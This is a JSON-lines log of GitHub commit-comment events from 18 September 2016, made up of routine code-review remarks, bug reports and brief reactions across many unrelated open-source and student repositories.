{"id":"4580338270","type":"CommitCommentEvent","actor":{"login":"Sandertv"},"repo":{"name":"diamond-gold/MiniBosses"},"payload":{"comment":{"id":19071528,"position":null,"line":null,"path":null,"commit_id":"3a3564d2fbd2c97478ff761265239e77ea590953","created_at":"2016-09-18T17:59:00Z","updated_at":"2016-09-18T17:59:00Z","body":"When the mob gets hit against a wall and falls through it it dissapears and respawns at its Original spawn location."}},"created_at":"2016-09-18T17:59:00Z"}
{"id":"4580339485","type":"CommitCommentEvent","actor":{"login":"berkerpeksag"},"repo":{"name":"celery/celery"},"payload":{"comment":{"id":19071530,"position":null,"line":null,"path":null,"commit_id":"fff12f08af8539c3e2e3c73733e69ce26e98194a","created_at":"2016-09-18T17:59:53Z","updated_at":"2016-09-18T17:59:53Z","body":"I've opened https://github.com/celery/celery/pull/3449. Please let me know if you have suggestions for wording."}},"created_at":"2016-09-18T17:59:53Z"}
{"id":"4580341959","type":"CommitCommentEvent","actor":{"login":"Balanar300hp"},"repo":{"name":"Balanar300hp/stack_tests"},"payload":{"comment":{"id":19071543,"position":null,"line":null,"path":null,"commit_id":"ed2660f6adb803ad84c688a747d559a107824b11","created_at":"2016-09-18T18:01:12Z","updated_at":"2016-09-18T18:01:12Z","body":"class stack "}},"created_at":"2016-09-18T18:01:12Z"}
{"id":"4580342240","type":"CommitCommentEvent","actor":{"login":"RyanTG"},"repo":{"name":"scottwainstock/pbm"},"payload":{"comment":{"id":19071545,"position":60,"line":60,"path":"app/views/pages/profile.html.haml","commit_id":"a67fa09123d5c47b7409107732904e3e0db2460f","created_at":"2016-09-18T18:01:22Z","updated_at":"2016-09-18T18:01:22Z","body":"I changed it to straight haml in last night's commit. It's a lot of spans, which is ugly to look at, but it's how I want it styled."}},"created_at":"2016-09-18T18:01:22Z"}
{"id":"4580344177","type":"CommitCommentEvent","actor":{"login":"rburkey2005"},"repo":{"name":"rburkey2005/virtualagc"},"payload":{"comment":{"id":19071549,"position":null,"line":null,"path":null,"commit_id":"a644de6322271fd23da23a343b136f3e52c638fc","created_at":"2016-09-18T18:02:34Z","updated_at":"2016-09-18T18:02:34Z","body":"\n    \nI imagine. They seem to have typically used a CS followed by a COM.\n\n\nSent on my Virgin Mobile Samsung Galaxy S® 5\n\n-------- Original message --------\nFrom: Mike Stewart <notifications@github.com> \nDate: 9/18/16  11:50 AM  (GMT-06:00) \nTo: rburkey2005/virtualagc <virtualagc@noreply.github.com> \nCc: rburkey2005 <rburkey2005@earthlink.net>, Author <author@noreply.github.com> \nSubject: Re: [rburkey2005/virtualagc] I believe there is a bug in Solarium055\r  at address 03,7210. It occurred (a644de6) \n\nOh jeez, I haven't. I didn't realize CA was a Block II addition. That must have been a godsend when it was added!\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n\n  \n  \n\n\n\n\n{\"api_version\":\"1.0\",\"publisher\":{\"api_key\":\"05dde50f1d1a384dd78767c55493e4bb\",\"name\":\"GitHub\"},\"entity\":{\"external_key\":\"github/rburkey2005/virtualagc\",\"title\":\"rburkey2005/virtualagc\",\"subtitle\":\"GitHub repository\",\"main_image_url\":\"https://cloud.githubusercontent.com/assets/143418/17495839/a5054eac-5d88-11e6-95fc-7290892c7bb5.png\",\"avatar_image_url\":\"https://cloud.githubusercontent.com/assets/143418/15842166/7c72db34-2c0b-11e6-9aed-b52498112777.png\",\"action\":{\"name\":\"Open in GitHub\",\"url\":\"https://github.com/rburkey2005/virtualagc\"}},\"updates\":{\"snippets\":[{\"icon\":\"PERSON\",\"message\":\"@thewonderidiot on a644de6: Oh jeez, I haven't. I didn't realize CA was a Block II addition. That must have been a godsend when it was added!\"}],\"action\":{\"name\":\"View Commit\",\"url\":\"https://github.com/rburkey2005/virtualagc/commit/a644de6322271fd23da23a343b136f3e52c638fc#commitcomment-19071337\"}}}"}},"created_at":"2016-09-18T18:02:34Z"}
{"id":"4580344181","type":"CommitCommentEvent","actor":{"login":"scottwainstock"},"repo":{"name":"scottwainstock/pbm"},"payload":{"comment":{"id":19071548,"position":60,"line":60,"path":"app/views/pages/profile.html.haml","commit_id":"a67fa09123d5c47b7409107732904e3e0db2460f","created_at":"2016-09-18T18:02:34Z","updated_at":"2016-09-18T18:02:34Z","body":"Yeah I think that's why I just dumped the straight html... too intimidating\nfor me.\n\nI'm almost done with the \"here's a page to entice you to sign up and get a\nprofile\" logic. I touched the header file a lot for that.\n\nOn Sun, Sep 18, 2016 at 11:01 AM, RyanTG <notifications@github.com> wrote:\n\n> I changed it to straight haml in last night's commit. It's a lot of spans,\n> which is ugly to look at, but it's how I want it styled.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/scottwainstock/pbm/commit/a67fa09123d5c47b7409107732904e3e0db2460f#commitcomment-19071545>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAK-LctdeMiTtw6AgdZoDn_2cFNpOqIbks5qrXxzgaJpZM4J_0Um>\n> .\n>\n"}},"created_at":"2016-09-18T18:02:34Z"}
{"id":"4580345040","type":"CommitCommentEvent","actor":{"login":"akkartik"},"repo":{"name":"akkartik/mu"},"payload":{"comment":{"id":19071550,"position":null,"line":null,"path":null,"commit_id":"51ae6e61e2d14354e66b95cc028b8d1ebddfdc74","created_at":"2016-09-18T18:03:09Z","updated_at":"2016-09-18T18:03:09Z","body":"Commit looks great :+1:. One issue with the example program, though. My browser never sees the OK, I think because the connection never closes. There's something wrong with the session socket never detecting end of stream on reads.."}},"created_at":"2016-09-18T18:03:09Z"}
{"id":"4580347677","type":"CommitCommentEvent","actor":{"login":"slindberf"},"repo":{"name":"slindberf/codebros"},"payload":{"comment":{"id":19071554,"position":5,"line":13,"path":"app/views/layouts/application.html.erb","commit_id":"c508b79f9440cde112611e3e5fb8b5444e169b1c","created_at":"2016-09-18T18:04:15Z","updated_at":"2016-09-18T18:04:15Z","body":"Rocio la tabulación estaba bien en sublime!"}},"created_at":"2016-09-18T18:04:15Z"}
{"id":"4580349421","type":"CommitCommentEvent","actor":{"login":"freebroccolo"},"repo":{"name":"RedPRL/sml-redprl"},"payload":{"comment":{"id":19071557,"position":null,"line":null,"path":null,"commit_id":"dc5a0f799d1f6b695d06c77125416946721eb825","created_at":"2016-09-18T18:05:19Z","updated_at":"2016-09-18T18:05:19Z","body":"Nice 👍 "}},"created_at":"2016-09-18T18:05:19Z"}
{"id":"4580351597","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":19071561,"position":null,"line":null,"path":null,"commit_id":"4d27783580a40e8dc24fd249f96962d52cd5c854","created_at":"2016-09-18T18:06:45Z","updated_at":"2016-09-18T18:06:45Z","body":"@bjansen 👍 "}},"created_at":"2016-09-18T18:06:45Z"}
{"id":"4580353244","type":"CommitCommentEvent","actor":{"login":"oVokick"},"repo":{"name":"oVokick/Stack"},"payload":{"comment":{"id":19071563,"position":null,"line":null,"path":null,"commit_id":"e2139dbb8924c231246c1512ce82808fa5bdc9de","created_at":"2016-09-18T18:07:49Z","updated_at":"2016-09-18T18:07:49Z","body":"Ошибка - 3.0.0"}},"created_at":"2016-09-18T18:07:49Z"}
{"id":"4580353809","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19071565,"position":32,"line":3286,"path":"github-dark.css","commit_id":"4ee3b5dc8ec9599b6734e4e91949a602a2f6480f","created_at":"2016-09-18T18:08:13Z","updated_at":"2016-09-18T18:08:13Z","body":"Is the `.highlight table` above necessary like that? I could see it causing issues too."}},"created_at":"2016-09-18T18:08:13Z"}
{"id":"4580355766","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19071569,"position":32,"line":3286,"path":"github-dark.css","commit_id":"4ee3b5dc8ec9599b6734e4e91949a602a2f6480f","created_at":"2016-09-18T18:09:34Z","updated_at":"2016-09-18T18:09:34Z","body":"It's part of the twilight style copied from [this gist](https://gist.github.com/dansimpson/803005). I don't remember if it was essential. Probably not."}},"created_at":"2016-09-18T18:09:34Z"}
{"id":"4580356016","type":"CommitCommentEvent","actor":{"login":"jackos1957"},"repo":{"name":"jackos1957/new_project"},"payload":{"comment":{"id":19071570,"position":null,"line":null,"path":null,"commit_id":"8344b060e22978c95f696e1217fd656b49fe8660","created_at":"2016-09-18T18:09:46Z","updated_at":"2016-09-18T18:09:46Z","body":"this is a learning test for github\r\n"}},"created_at":"2016-09-18T18:09:46Z"}
{"id":"4580357171","type":"CommitCommentEvent","actor":{"login":"Balanar300hp"},"repo":{"name":"Balanar300hp/stack_tests"},"payload":{"comment":{"id":19071571,"position":null,"line":null,"path":null,"commit_id":"6b14d52b7e5a6fc97aaf6c7e86af8c40db1dd7e6","created_at":"2016-09-18T18:10:29Z","updated_at":"2016-09-18T18:10:29Z","body":"2 пункт ТЗ"}},"created_at":"2016-09-18T18:10:29Z"}
{"id":"4580357477","type":"CommitCommentEvent","actor":{"login":"christian-fei"},"repo":{"name":"AlessioCoser/dotfiles"},"payload":{"comment":{"id":19071572,"position":null,"line":null,"path":null,"commit_id":"842d7fdffdb8926b1284048a77d837cacf35382f","created_at":"2016-09-18T18:10:42Z","updated_at":"2016-09-18T18:10:42Z","body":"bravo 🎉 "}},"created_at":"2016-09-18T18:10:42Z"}
{"id":"4580357634","type":"CommitCommentEvent","actor":{"login":"k-joseph"},"repo":{"name":"IsantePlus/openmrs-module-isantepluspatientdashboard"},"payload":{"comment":{"id":19071573,"position":20,"line":20,"path":"omod/src/main/webapp/pages/drugsHistory.gsp","commit_id":"bbdf98038645d8c3326da1f0ed5b38630a61b05e","created_at":"2016-09-18T18:10:49Z","updated_at":"2016-09-18T18:10:49Z","body":"@Guerschon Medicaments should be replaced with a code defined in messages.properties file(s) where this should be, see the file"}},"created_at":"2016-09-18T18:10:49Z"}
{"id":"4580357912","type":"CommitCommentEvent","actor":{"login":"Balanar300hp"},"repo":{"name":"Balanar300hp/stack_tests"},"payload":{"comment":{"id":19071574,"position":null,"line":null,"path":null,"commit_id":"c78b21fcb92a9448e43408e1966f8d99771343be","created_at":"2016-09-18T18:11:00Z","updated_at":"2016-09-18T18:11:00Z","body":"3 пункт ТЗ"}},"created_at":"2016-09-18T18:11:00Z"}
{"id":"4580358409","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19071575,"position":32,"line":3286,"path":"github-dark.css","commit_id":"4ee3b5dc8ec9599b6734e4e91949a602a2f6480f","created_at":"2016-09-18T18:11:22Z","updated_at":"2016-09-18T18:11:22Z","body":"Let's drop it. If there are really wrongly colored backgrounds, we can surely find a better solution."}},"created_at":"2016-09-18T18:11:22Z"}
{"id":"4580358715","type":"CommitCommentEvent","actor":{"login":"adamdicarlo"},"repo":{"name":"adamdicarlo/dotfiles"},"payload":{"comment":{"id":19071577,"position":5,"line":27,"path":"home/.zshrc","commit_id":"e69bad9e81e6e2561e47d97700a732fa11ac9baf","created_at":"2016-09-18T18:11:36Z","updated_at":"2016-09-18T18:11:36Z","body":"🚀 "}},"created_at":"2016-09-18T18:11:36Z"}
{"id":"4580358767","type":"CommitCommentEvent","actor":{"login":"akkartik"},"repo":{"name":"akkartik/mu"},"payload":{"comment":{"id":19071578,"position":null,"line":null,"path":null,"commit_id":"51ae6e61e2d14354e66b95cc028b8d1ebddfdc74","created_at":"2016-09-18T18:11:38Z","updated_at":"2016-09-18T18:11:38Z","body":"When `read` gets to the end of a socket's `fd`, it doesn't seem to return eof, it just blocks waiting for more data from the browser.\r\n\r\nIn the [example from Wart](https://github.com/akkartik/wart/blob/91356d9385/071http_server.wart#L12) that we've been following, the socket is never read past the first line. That's why Wart never ran into this problem. It also never supported PUT/POST requests, which would provide a delimiter passed in the headers and then stop reading when they hit it.\r\n\r\nBasically there's no eof for socket streams. Lesson learned."}},"created_at":"2016-09-18T18:11:38Z"}
{"id":"4580359230","type":"CommitCommentEvent","actor":{"login":"ibilon"},"repo":{"name":"openfl/openfl"},"payload":{"comment":{"id":19071581,"position":null,"line":null,"path":null,"commit_id":"66b9f80b236a217b985a6e135f4bb3cb888948c1","created_at":"2016-09-18T18:11:56Z","updated_at":"2016-09-18T18:11:56Z","body":"yes we'll need another way, it prevent all crashes and gives the error message about entry point instead"}},"created_at":"2016-09-18T18:11:56Z"}
{"id":"4580359483","type":"CommitCommentEvent","actor":{"login":"k-joseph"},"repo":{"name":"IsantePlus/openmrs-module-isantepluspatientdashboard"},"payload":{"comment":{"id":19071582,"position":17,"line":777,"path":"api/src/main/java/org/openmrs/module/isantepluspatientdashboard/api/impl/IsantePlusPatientDashboardServiceImpl.java","commit_id":"bbdf98038645d8c3326da1f0ed5b38630a61b05e","created_at":"2016-09-18T18:12:08Z","updated_at":"2016-09-18T18:12:08Z","body":"these concept ids should be made configurable through global properties"}},"created_at":"2016-09-18T18:12:08Z"}
{"id":"4580360426","type":"CommitCommentEvent","actor":{"login":"DMLearn"},"repo":{"name":"DMLearn/Taschenrechner_Iteration_1"},"payload":{"comment":{"id":19071584,"position":null,"line":null,"path":null,"commit_id":"454dd80affdc3d5bbdb0e9fd571ee7a8648486d2","created_at":"2016-09-18T18:12:50Z","updated_at":"2016-09-18T18:12:50Z","body":"Lektion 92"}},"created_at":"2016-09-18T18:12:50Z"}
{"id":"4580360560","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19071585,"position":32,"line":3286,"path":"github-dark.css","commit_id":"4ee3b5dc8ec9599b6734e4e91949a602a2f6480f","created_at":"2016-09-18T18:12:56Z","updated_at":"2016-09-18T18:12:56Z","body":"BTW, It's already causing issues, like this text right here is too white 😉 "}},"created_at":"2016-09-18T18:12:56Z"}
{"id":"4580361124","type":"CommitCommentEvent","actor":{"login":"mbansse"},"repo":{"name":"SambaEdu/se3-docs"},"payload":{"comment":{"id":19071586,"position":null,"line":null,"path":null,"commit_id":"252ea0eef84c770605b1db892ccc0183e81a1407","created_at":"2016-09-18T18:13:18Z","updated_at":"2016-09-18T18:13:18Z","body":"Merci Michel....la mise en page et moi ça fait 2!!!!"}},"created_at":"2016-09-18T18:13:18Z"}
{"id":"4580361620","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19071588,"position":32,"line":3286,"path":"github-dark.css","commit_id":"4ee3b5dc8ec9599b6734e4e91949a602a2f6480f","created_at":"2016-09-18T18:13:37Z","updated_at":"2016-09-18T18:13:37Z","body":"done"}},"created_at":"2016-09-18T18:13:37Z"}
{"id":"4580361684","type":"CommitCommentEvent","actor":{"login":"k-joseph"},"repo":{"name":"IsantePlus/openmrs-module-isantepluspatientdashboard"},"payload":{"comment":{"id":19071589,"position":28,"line":788,"path":"api/src/main/java/org/openmrs/module/isantepluspatientdashboard/api/impl/IsantePlusPatientDashboardServiceImpl.java","commit_id":"bbdf98038645d8c3326da1f0ed5b38630a61b05e","created_at":"2016-09-18T18:13:40Z","updated_at":"2016-09-18T18:13:40Z","body":"why are you using date dispensed observations here?"}},"created_at":"2016-09-18T18:13:40Z"}
{"id":"4580363926","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19071598,"position":32,"line":3286,"path":"github-dark.css","commit_id":"4ee3b5dc8ec9599b6734e4e91949a602a2f6480f","created_at":"2016-09-18T18:15:13Z","updated_at":"2016-09-18T18:15:13Z","body":"Ah, much better not having to look at `F8F8F8` any more 😹 "}},"created_at":"2016-09-18T18:15:13Z"}
{"id":"4580364692","type":"CommitCommentEvent","actor":{"login":"azemoh"},"repo":{"name":"azemoh/bootcamp-XIX-group-3"},"payload":{"comment":{"id":19071602,"position":4,"line":72,"path":"README.md","commit_id":"fd7758a8d23fe5e26cd24c38099a4ec7e9f842df","created_at":"2016-09-18T18:15:43Z","updated_at":"2016-09-18T18:15:43Z","body":"I 👀 you ObiTech @gcamon good work 👍  http://forecast.ng."}},"created_at":"2016-09-18T18:15:43Z"}
{"id":"4580364864","type":"CommitCommentEvent","actor":{"login":"k-joseph"},"repo":{"name":"IsantePlus/openmrs-module-isantepluspatientdashboard"},"payload":{"comment":{"id":19071603,"position":null,"line":null,"path":null,"commit_id":"bbdf98038645d8c3326da1f0ed5b38630a61b05e","created_at":"2016-09-18T18:15:51Z","updated_at":"2016-09-18T18:15:51Z","body":"Drugs in OpenMRS are managed through a separate api; Drug Order API rewritten from 1.10.0, you need to use the same api through this method and rewrite this i think to retrieve drug history through drug orders, in this case drug history would be ordered drug history"}},"created_at":"2016-09-18T18:15:51Z"}
{"id":"4580365960","type":"CommitCommentEvent","actor":{"login":"soeiner"},"repo":{"name":"Machplatzwennduunsaufderstrassesiehst/Mental"},"payload":{"comment":{"id":19071607,"position":null,"line":null,"path":null,"commit_id":"5c7a453811015cc45fddd339168a46773418487f","created_at":"2016-09-18T18:16:34Z","updated_at":"2016-09-18T18:16:34Z","body":"der versus modus klingt interressant :D Spielen da zwei Teams auf einer Map gegeneinander und müssen ihre goals möglichst schnell weg haben oder die gegnerischen? \r\nWäre es auch ok, die Farben über eine zusätzliche colorId von goals zu machen?\r\nGibt es bereits einen Befehlstyp für die zerstörten Goals?"}},"created_at":"2016-09-18T18:16:34Z"}
{"id":"4580366690","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"carenbraj/relaxr"},"payload":{"comment":{"id":19071609,"position":30,"line":30,"path":"relaxr_blog/index.html","commit_id":"c532ab850cbb596d998b5aeb92f55113680c6b7c","created_at":"2016-09-18T18:17:07Z","updated_at":"2016-09-18T18:17:07Z","body":"You did a great job picking out the elements when we were working on this !"}},"created_at":"2016-09-18T18:17:07Z"}
{"id":"4580367749","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"carenbraj/relaxr"},"payload":{"comment":{"id":19071610,"position":73,"line":73,"path":"relaxr_blog/index.html","commit_id":"c532ab850cbb596d998b5aeb92f55113680c6b7c","created_at":"2016-09-18T18:17:50Z","updated_at":"2016-09-18T18:17:50Z","body":"Little typo, should be ...\r\n\r\n```\r\n\t<aside id=\"bottom-cta\">\r\n```"}},"created_at":"2016-09-18T18:17:50Z"}
{"id":"4580368959","type":"CommitCommentEvent","actor":{"login":"sarav"},"repo":{"name":"oskomonzon/GoIV"},"payload":{"comment":{"id":19071612,"position":null,"line":null,"path":null,"commit_id":"2ff97bd15ba933b541eab59e9b6981318355e2d5","created_at":"2016-09-18T18:18:41Z","updated_at":"2016-09-18T18:18:41Z","body":"I haven't thoroughly reviewed the correctness of these splits, but the it's the right thing to do."}},"created_at":"2016-09-18T18:18:41Z"}
{"id":"4580369849","type":"CommitCommentEvent","actor":{"login":"soeiner"},"repo":{"name":"Machplatzwennduunsaufderstrassesiehst/Mental"},"payload":{"comment":{"id":19071613,"position":null,"line":null,"path":null,"commit_id":"22712b8f98e466f5e80274b1e34a9d115a10dc53","created_at":"2016-09-18T18:19:18Z","updated_at":"2016-09-18T18:19:18Z","body":":+1: "}},"created_at":"2016-09-18T18:19:18Z"}
{"id":"4580370315","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"carenbraj/relaxr"},"payload":{"comment":{"id":19071615,"position":53,"line":53,"path":"relaxr_blog/index.html","commit_id":"c532ab850cbb596d998b5aeb92f55113680c6b7c","created_at":"2016-09-18T18:19:35Z","updated_at":"2016-09-18T18:19:35Z","body":"You could actually have this `<aside>` outside of the `<section>` element...nice work floating this to the right.  You would also want to float the main `<section>` to the right, and provide a set width on both of the columns.  Please give this a shot, and upload it again so I could have a look! Thank you!"}},"created_at":"2016-09-18T18:19:35Z"}
{"id":"4580372166","type":"CommitCommentEvent","actor":{"login":"msuquet"},"repo":{"name":"SambaEdu/se3-docs"},"payload":{"comment":{"id":19071619,"position":null,"line":null,"path":null,"commit_id":"252ea0eef84c770605b1db892ccc0183e81a1407","created_at":"2016-09-18T18:20:51Z","updated_at":"2016-09-18T18:20:51Z","body":"Le 18/09/2016 à 20:13, mbansse a écrit :\n> Merci Michel....la mise en page et moi ça fait 2!!!!\nIl faut dire que ce n'est pas évident quand on s'y remet tous les 36 du \nmois ;)\n\nD'ailleurs, tu as pu remarquer que même François a dû s'y reprendre à \nplusieurs fois…\n\nÀ+,\n\n-- \nMichel Suquet\nCollège Jean-Monnet\nhttp://www.clg-monnet-briis.ac-versailles.fr/\n"}},"created_at":"2016-09-18T18:20:51Z"}
{"id":"4580372455","type":"CommitCommentEvent","actor":{"login":"sarav"},"repo":{"name":"oskomonzon/GoIV"},"payload":{"comment":{"id":19071620,"position":null,"line":null,"path":null,"commit_id":"b3b5fa7d5a69bc43b78a6fa6adc69662b246e5b8","created_at":"2016-09-18T18:21:02Z","updated_at":"2016-09-18T18:21:02Z","body":"Well, at a glance this looks reasonable too. But if it's crashing, clearly something is wrong. I'll try to take a closer look."}},"created_at":"2016-09-18T18:21:02Z"}
{"id":"4580373703","type":"CommitCommentEvent","actor":{"login":"rmuhire"},"repo":{"name":"exuusdevteam/asprin"},"payload":{"comment":{"id":19071621,"position":null,"line":null,"path":null,"commit_id":"93b99f2561776b8d9383f712cd907cdf478c7a06","created_at":"2016-09-18T18:21:56Z","updated_at":"2016-09-18T18:21:56Z","body":"Added ng-include for separation"}},"created_at":"2016-09-18T18:21:56Z"}
{"id":"4580373876","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"carenbraj/relaxr"},"payload":{"comment":{"id":19071622,"position":91,"line":91,"path":"relaxr_blog/css/style.css","commit_id":"c532ab850cbb596d998b5aeb92f55113680c6b7c","created_at":"2016-09-18T18:22:03Z","updated_at":"2016-09-18T18:22:03Z","body":"Great work with the horizontal nav bar!"}},"created_at":"2016-09-18T18:22:03Z"}
{"id":"4580373945","type":"CommitCommentEvent","actor":{"login":"jmdarts007"},"repo":{"name":"facebook/react-native-applinks"},"payload":{"comment":{"id":19071623,"position":null,"line":null,"path":null,"commit_id":"ad560e380da3685024e5bd0d9350bf30dbee9082","created_at":"2016-09-18T18:22:06Z","updated_at":"2016-09-18T18:22:06Z","body":"Thanks my improvements  help you \r\n![10484579_512050682264034_7295212813980010247_n](https://cloud.githubusercontent.com/assets/5926344/18618011/cfd850c4-7dfa-11e6-8ffe-acc3e8faf428.jpg)\r\n![11078083_607884449347323_6525705012508379448_n](https://cloud.githubusercontent.com/assets/5926344/18618014/e46079f4-7dfa-11e6-8e3c-c76a3cb56901.jpg)\r\n\r\n"}},"created_at":"2016-09-18T18:22:06Z"}
{"id":"4580373954","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19071624,"position":55,"line":245,"path":"main/src/core/MonoDevelop.Ide/MonoDevelop.Components/GtkUtil.cs","commit_id":"161ed4e2d74fd061634088ef0d82dd9cde76246a","created_at":"2016-09-18T18:22:07Z","updated_at":"2016-09-18T18:22:07Z","body":"Possible duplicate of https://github.com/mono/monodevelop/blob/master/main/src/addins/MacPlatform/MainToolbar/MainToolbar.cs#L334  ?"}},"created_at":"2016-09-18T18:22:07Z"}
{"id":"4580373958","type":"CommitCommentEvent","actor":{"login":"durdagyula"},"repo":{"name":"durdagyula/firstLesson"},"payload":{"comment":{"id":19071625,"position":null,"line":null,"path":null,"commit_id":"c5fa86c91d1babd06926bea6544226d23e2748e3","created_at":"2016-09-18T18:22:07Z","updated_at":"2016-09-18T18:22:07Z","body":"Description of the first lesson!"}},"created_at":"2016-09-18T18:22:07Z"}
{"id":"4580374365","type":"CommitCommentEvent","actor":{"login":"DemonWav"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":19071626,"position":null,"line":null,"path":null,"commit_id":"f7cfe1f769a715a46c22741066185c8060ca8223","created_at":"2016-09-18T18:22:23Z","updated_at":"2016-09-18T18:22:23Z","body":"Now we need to actually apply nullability annotations to the API."}},"created_at":"2016-09-18T18:22:23Z"}
{"id":"4580375173","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"carenbraj/relaxr"},"payload":{"comment":{"id":19071628,"position":119,"line":119,"path":"relaxr_blog/css/style.css","commit_id":"c532ab850cbb596d998b5aeb92f55113680c6b7c","created_at":"2016-09-18T18:22:56Z","updated_at":"2016-09-18T18:22:56Z","body":"Great job with the buttons!"}},"created_at":"2016-09-18T18:22:56Z"}
{"id":"4580377334","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"carenbraj/relaxr"},"payload":{"comment":{"id":19071633,"position":101,"line":101,"path":"relaxr_blog/css/style.css","commit_id":"c532ab850cbb596d998b5aeb92f55113680c6b7c","created_at":"2016-09-18T18:24:31Z","updated_at":"2016-09-18T18:24:31Z","body":"You could choose to float both the main section and the sidebar, or set both to `display:inline-block`, but you don't need to do both...this may help!  http://learnlayout.com/inline-block.html"}},"created_at":"2016-09-18T18:24:31Z"}
{"id":"4580380165","type":"CommitCommentEvent","actor":{"login":"parnasmi"},"repo":{"name":"parnasmi/Optimized-Gulp-Template-for-Verstka-"},"payload":{"comment":{"id":19071639,"position":4,"line":3,"path":"app/pug/template-include-files/mainJs.html","commit_id":"40f1d57502e4e9fda4f034fb6a32c1de6e0cbef5","created_at":"2016-09-18T18:26:29Z","updated_at":"2016-09-18T18:26:29Z","body":"Comma added. Without comma there were some mistakes\r\n"}},"created_at":"2016-09-18T18:26:29Z"}
{"id":"4580382116","type":"CommitCommentEvent","actor":{"login":"HimbeersaftLP"},"repo":{"name":"BoxOfDevs/BoxOfBits"},"payload":{"comment":{"id":19071648,"position":null,"line":null,"path":null,"commit_id":"1014a4af2550215892a9045cb3c9ede077f780f6","created_at":"2016-09-18T18:27:54Z","updated_at":"2016-09-18T18:27:54Z","body":"WTF"}},"created_at":"2016-09-18T18:27:54Z"}
{"id":"4580382521","type":"CommitCommentEvent","actor":{"login":"m1a9l9t7e"},"repo":{"name":"Machplatzwennduunsaufderstrassesiehst/Mental"},"payload":{"comment":{"id":19071652,"position":null,"line":null,"path":null,"commit_id":"5c7a453811015cc45fddd339168a46773418487f","created_at":"2016-09-18T18:28:10Z","updated_at":"2016-09-18T18:28:10Z","body":"@soeiner Jo das mit der colorId klingt gut soll das einfach nur ne zahl oder wirklich nen rgb code sein ? Und es gibt noch keinen Befehlstyp für die zerstörung von goals, du kannst dir von mir aus den Namen wünschen ;)"}},"created_at":"2016-09-18T18:28:10Z"}
{"id":"4580383566","type":"CommitCommentEvent","actor":{"login":"k-joseph"},"repo":{"name":"IsantePlus/openmrs-module-isantepluspatientdashboard"},"payload":{"comment":{"id":19071655,"position":20,"line":79,"path":"omod/src/main/resources/apps/isantepluspatientdashboard_extension.json","commit_id":"bbdf98038645d8c3326da1f0ed5b38630a61b05e","created_at":"2016-09-18T18:28:52Z","updated_at":"2016-09-18T18:28:52Z","body":"probably we need to think of a better icon for this as well as lab history @jeandaboul "}},"created_at":"2016-09-18T18:28:52Z"}
{"id":"4580384274","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19071659,"position":13,"line":758,"path":"css-fonts/Fonts.src.html","commit_id":"88471113c35fd19a98f43eecbd0302e1466a06ba","created_at":"2016-09-18T18:29:22Z","updated_at":"2016-09-18T18:29:22Z","body":"Add a note that a variation font may have its own internal mappings of these numbers, but those mappings are ignored, and this table is use instead."}},"created_at":"2016-09-18T18:29:22Z"}
{"id":"4580384370","type":"CommitCommentEvent","actor":{"login":"Sandertv"},"repo":{"name":"BoxOfDevs/BoxOfBits"},"payload":{"comment":{"id":19071660,"position":null,"line":null,"path":null,"commit_id":"1014a4af2550215892a9045cb3c9ede077f780f6","created_at":"2016-09-18T18:29:27Z","updated_at":"2016-09-18T18:29:27Z","body":"@HimbeersaftLP did you get mah email?"}},"created_at":"2016-09-18T18:29:27Z"}
{"id":"4580387069","type":"CommitCommentEvent","actor":{"login":"HimbeersaftLP"},"repo":{"name":"BoxOfDevs/BoxOfBits"},"payload":{"comment":{"id":19071665,"position":null,"line":null,"path":null,"commit_id":"1014a4af2550215892a9045cb3c9ede077f780f6","created_at":"2016-09-18T18:31:20Z","updated_at":"2016-09-18T18:31:20Z","body":"Yes, I'll try to do it today or tomorrow, ist that ok?"}},"created_at":"2016-09-18T18:31:20Z"}
{"id":"4580389240","type":"CommitCommentEvent","actor":{"login":"scottwainstock"},"repo":{"name":"scottwainstock/pbm"},"payload":{"comment":{"id":19071672,"position":null,"line":null,"path":null,"commit_id":"a67fa09123d5c47b7409107732904e3e0db2460f","created_at":"2016-09-18T18:32:55Z","updated_at":"2016-09-18T18:32:55Z","body":"username is a link: 292c6b73a8d32d532893a5fb219ad5434d72e8a6\r\nget_a_profile page: 317d54aa5e6e2351228026699a51c5b05896d83b"}},"created_at":"2016-09-18T18:32:55Z"}
{"id":"4580392454","type":"CommitCommentEvent","actor":{"login":"jagg-ix"},"repo":{"name":"jagg-ix/sicp_es"},"payload":{"comment":{"id":19071679,"position":null,"line":null,"path":null,"commit_id":"b93f8bbe83f6a0483786da9dac307762c70ec172","created_at":"2016-09-18T18:34:59Z","updated_at":"2016-09-18T18:34:59Z","body":"this only does the sum of squares, afterwards i will define a function with branching to select the two biggest and passthem as parameters."}},"created_at":"2016-09-18T18:34:59Z"}
